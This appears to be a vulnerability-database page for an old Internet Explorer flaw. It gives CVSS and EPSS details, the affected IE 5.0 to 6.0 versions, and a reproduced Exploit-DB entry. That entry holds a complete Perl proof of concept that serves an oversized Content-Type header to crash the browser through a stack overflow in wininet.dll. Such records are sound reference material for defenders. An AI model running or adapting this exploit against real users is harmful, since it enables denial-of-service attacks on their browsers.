Metrics
Metrics |
Score |
Severity |
CVSS Vector |
Source |
V2 |
5 |
|
AV:N/AC:L/Au:N/C:N/I:N/A:P |
nvd@nist.gov |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 2039
Publication date : 2006-07-19 22h00 +00:00
Author : Firestorm
EDB Verified : Yes
#!/usr/bin/perl
# Stack overflow in wininet.dll while parsing huge( > ~1M) Content-Type response
# ex.: Unhandled exception at 0x771c00ee in IEXPLORE.EXE: 0xC00000FD: Stack overflow.
#
# discovered by Firestorm
#
# Usage:
# 1) run this code
# 2) open http://127.0.0.1/ with IE
#
use IO::Socket;
my $sock=new IO::Socket::INET (Listen => 1,
LocalAddr => 'localhost',
LocalPort => 80,
Proto => 'tcp');
die unless $sock;
$huge="A" x 1100000;
$|=1;
print ">http server started on port 80... try 'iexplore http://127.0.0.1/' \n";
$z=$sock->accept();
print ">connection!\n";
do
{
$ln=<$z>;
print $ln;
chomp $ln;
if (($ln eq "")||($ln eq "\n")||($ln eq "\r"))
{
print ">sending response\n";
print $z "HTTP/1.1 200 OK\r\nServer: X3 1.0\r\nContent-Type: $huge\r\nConnection: close\r\n\r\ndone";
close($z);
exit;
}
} while (true);
# milw0rm.com [2006-07-20]
Products Mentioned
Configuraton 0
Microsoft>>Internet_explorer >> Version 5.0
Microsoft>>Internet_explorer >> Version 5.0.1
Microsoft>>Internet_explorer >> Version 5.0.1
Microsoft>>Internet_explorer >> Version 5.0.1
Microsoft>>Internet_explorer >> Version 5.0.1
Microsoft>>Internet_explorer >> Version 5.0.1
Microsoft>>Internet_explorer >> Version 5.5
Microsoft>>Internet_explorer >> Version 5.5
Microsoft>>Internet_explorer >> Version 5.5
Microsoft>>Internet_explorer >> Version 6.0
Microsoft>>Internet_explorer >> Version 6.0
Microsoft>>Internet_explorer >> Version 6.0
References